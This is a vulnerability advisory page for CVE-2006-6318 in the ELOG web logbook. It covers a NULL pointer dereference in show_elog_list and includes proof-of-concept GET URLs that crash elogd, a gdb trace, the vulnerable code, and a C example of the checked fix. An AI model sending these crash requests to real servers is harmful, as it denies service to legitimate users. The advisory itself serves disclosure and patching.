ELOG Web Logbook 'elogd.c' show_elog_list Function Denial of Service Vulnerability

Vulnerability ID: 1192337        Type: Other
Published: 2006-11-13            Updated: 2007-01-25
CVE: CVE-2006-6318               CNNVD-ID: CNNVD-200612-591
Platform: N/A                    CVSS score: 5.0
|Source
https://www.securityfocus.com/bid/21028
https://cxsecurity.com/issue/WLB-2006120128
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-591
|Details
The show_elog_list function in elogd.c in elog 2.6.2 and earlier has a denial of service vulnerability. A remote authenticated user who attempts to access a logbook whose name begins with "global" triggers a NULL pointer dereference, causing a denial of service (daemon crash).
|Exploit
Remote exploitation of a denial of service vulnerability in ELOG's
elogd server allows attackers to crash the service, thereby preventing
legitimate access.
(http://midas.psi.ch/elog/index.html)

Attached is the advisory which details the vulnerability.

Thanks,
OS2A
ELOG Web Logbook Remote Denial of Service Vulnerability

OS2A ID: OS2A_1008              Status:
                                10/31/2006  Issue Discovered
                                11/08/2006  Reported to the Vendor
                                11/08/2006  Fixed by Vendor
                                11/10/2006  Advisory Released

Class: Denial of Service		Severity: Medium

Overview:
---------
The Electronic Logbook (ELOG) is part of a family of applications known as
weblogs. ELOG is a remarkable implementation of a weblog in its simplicity of
use and versatility.
http://midas.psi.ch/elog/index.html

Description:
------------
Remote exploitation of a denial of service vulnerability in ELOG's
elogd server allows attackers to crash the service, thereby preventing
legitimate access.

The [global] section in the configuration file elogd.cfg is used for settings
common to all logbooks; it is not a logbook itself. The vulnerability is due to
improper handling of an HTTP GET request when the logbook name 'global' (or any
logbook name prefixed with 'global') is used in the request. When such a request
is received, a NULL pointer dereference occurs, leading to a crash of the service.

Only authenticated users can exploit this vulnerability if the application
is configured with a password.

Impact:
-------
Successful exploitation allows a remote attacker to crash the elogd server.

Affected Software(s):
---------------------
ELOG 2.6.2 (SVN revision 1748) and prior.
The Debian package elog 2.6.2+r1719-1 and prior are also vulnerable.

Proof of Concept:
-----------------
The HTTP GET request given below is sufficient to crash an affected server:
http://www.example.com/global/
or
Create a logbook [global_xxx] or [global xxx] in elogd.cfg
and try to access it using a browser:
http://www.example.com/global_xxx/
http://www.example.com/global%20xxx/

Analysis:
-----------
#gdb ./elogd
...
...

(gdb) break show_elog_list
Breakpoint 2 at 0x809d6e0

(gdb) c
Continuing.
(no debugging symbols found)
elogd 2.6.2 built Nov  8 2006, 01:25:48 revision 1699
Falling back to default group "elog"
Falling back to default user "elog"
Indexing logbooks ... done
Server listening on port 8080 ...

Breakpoint 2, 0x0809d6e0 in show_elog_list ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x0809eb7a in show_elog_list ()

(gdb) bt
#0  0x0809eb7a in show_elog_list ()
#1  0x00000000 in ?? ()

(gdb) i r
eax            0x0      0
ecx            0x9d43d88        164904328
edx            0x0      0
ebx            0x0      0
esp            0xbfa8aca0       0xbfa8aca0
ebp            0x80df40c        0x80df40c
esi            0xbfb27050       -1078824880
edi            0x0      0
eip            0x809eb7a        0x809eb7a
eflags         0x200246 2097734
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51

(gdb) x/i $eip
0x809eb7a <show_elog_list+5274>:        mov    (%eax),%eax

The vulnerable code is at line 16774 of elogd.c:
n_msg = *lbs->n_el_index;
where the pointer lbs is dereferenced without first being checked for NULL.

--- elogd.c, show_elog_list() -----

   } else {
      n_logbook = 1;
      n_msg = *lbs->n_el_index;
   }

   msg_list = xmalloc(sizeof(MSG_LIST) * n_msg);

---elogd.c, show_elog_list() -----
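The defect in the Description and Analysis sections is a lookup result that is dereferenced before it is validated: a request for a "global..." name has no logbook behind it, so lbs is NULL and `*lbs->n_el_index` reads through address zero (the `mov (%eax),%eax` with eax = 0 in the register dump). The following C program is an added example written for this page, not ELOG's own code; the LOGBOOK structure, find_logbook() and the two count_entries_*() functions are assumptions that model the pattern, and the logbook table is constructed sample data. It places the unchecked dereference beside a hardened form that rejects the request instead of crashing the process.

```c
/* Added example (not ELOG's code): the lookup/dereference pattern from the
 * advisory and its hardened form. All names here are assumptions. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Minimal stand-in for a per-logbook structure (assumed shape). */
typedef struct {
    const char *name;
    int *n_el_index;   /* points at the logbook's entry count */
} LOGBOOK;

/* Constructed configuration: three logbooks, each with an entry count. */
static int counts[3] = { 12, 0, 7 };
static LOGBOOK logbooks[] = {
    { "demo",    &counts[0] },
    { "empty",   &counts[1] },
    { "physics", &counts[2] },
};
#define N_LOGBOOKS (sizeof(logbooks) / sizeof(logbooks[0]))

/* [global] and anything prefixed "global" are settings sections, not
 * logbooks, so the lookup has no entry for them and returns NULL. */
LOGBOOK *find_logbook(const char *name)
{
    if (strncmp(name, "global", 6) == 0)
        return NULL;
    for (size_t i = 0; i < N_LOGBOOKS; i++)
        if (strcmp(logbooks[i].name, name) == 0)
            return &logbooks[i];
    return NULL;
}

/* Vulnerable pattern from the advisory: lbs is dereferenced with no NULL
 * check. For a "global..." name this is a NULL pointer read (SIGSEGV). */
int count_entries_unchecked(const char *name)
{
    LOGBOOK *lbs = find_logbook(name);
    int n_msg = *lbs->n_el_index;  /* crashes when lbs == NULL */
    return n_msg;
}

/* Hardened form: validate the lookup result before any field access and
 * turn the bad request into an error the caller can report (-1 here,
 * standing in for an HTTP error response). */
int count_entries_checked(const char *name)
{
    LOGBOOK *lbs = find_logbook(name);
    if (lbs == NULL || lbs->n_el_index == NULL)
        return -1;
    return *lbs->n_el_index;
}

int main(void)
{
    /* Constructed request names, including the ones from the advisory. */
    const char *requests[] = { "demo", "empty", "global", "global_xxx",
                               "global xxx", "nosuch" };
    for (size_t i = 0; i < sizeof(requests) / sizeof(requests[0]); i++) {
        int n = count_entries_checked(requests[i]);
        if (n < 0)
            printf("%-11s -> rejected (no such logbook)\n", requests[i]);
        else
            printf("%-11s -> %d entries\n", requests[i], n);
    }
    /* count_entries_unchecked("global") would segfault; it is not called. */
    return 0;
}
```

The check belongs at the lookup boundary, before the value is used to size the xmalloc() in the snippet above: a NULL there takes the daemon down for every user, whereas an error response costs only the one request.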

CVSS Score Report:
-----------------
    ACCESS_VECTOR          = REMOTE
    ACCESS_COMPLEXITY      = LOW
    AUTHENTICATION         = NOT_REQUIRED
    CONFIDENTIALITY_IMPACT = NONE
    INTEGRITY_IMPACT       = NONE
    AVAILABILITY_IMPACT    = COMPLETE
    IMPACT_BIAS            = AVAILABILITY
    EXPLOITABILITY         = FUNCTIONAL
    REMEDIATION_LEVEL      = OFFICIAL_FIX
    REPORT_CONFIDENCE      = CONFIRMED
    CVSS Base Score        = 5.0 (AV:R/AC:L/Au:NR/C:N/I:N/A:C/B:A)
    CVSS Temporal Score    = 4.1
    Risk factor            = Medium

Vendor Response:
---------------
The vendor has acknowledged the vulnerability and released a fixed version,
ELOG version 2.6.2-7 (SVN revision 1749).
http://savannah.psi.ch/websvn/log.php?repname=elog&path=%2Ftrunk%2F&rev=0&sc=0&isdir=1
(Revisions 1746-1749)

Debian has fixed this issue in elog_2.6.2+r1754-1,
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=397875

Solution:
---------
Install the fixed version,
ELOG version 2.6.2-7 (SVN revision 1749) or later.
http://midas.psi.ch/elog/download.html

For Debian, update to elog_2.6.2+r1754-1 or later.

Credits:
-------
Jayesh KS and Arun Kethipelly of OS2A have been credited with the discovery and
analysis of this vulnerability.
|Affected products
Elog Web Logbook 2.6.2 SVN revision 1748
Elog Web Logbook 2.6.2
Elog Web Logbook 2.6.1
Elog Web Logbook 2.6.0
Elog Web L
|References

Source: BID
Name: 21028
Link: http://www.securityfocus.com/bid/21028
Source: DEBIAN
Name: DSA-1242
Link: http://www.debian.org/security/2006/dsa-1242
Source: SECUNIA
Name: 23580
Link: http://secunia.com/advisories/23580
Source: MISC
Link: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=397875
Source: BUGTRAQ
Name: 20061113 ELOG Web Logbook Remote Denial of Service Vulnerability
Link: http://www.securityfocus.com/archive/1/451351
Source: SECTRACK
Name: 1017450
Link: http://securitytracker.com/id?1017450
Source: OSVDB
Name: 30272
Link: http://www.osvdb.org/30272
Source: VUPEN
Name: ADV-2006-4423
Link: http://www.frsirt.com/english/advisories/2006/4423
Source: SREASON
Name: 2060
Link: http://securityreason.com/securityalert/2060
Source: SECUNIA
Name: 22800
Link: http://secunia.com/advisories/22800
Source: FULLDISC
Name: 20061112 ELOG Web Logbook Remote Denial of Service Vulnerability
Link: http://archives.neohapsis.com/archives/fulldisclosure/2006-11/0198.html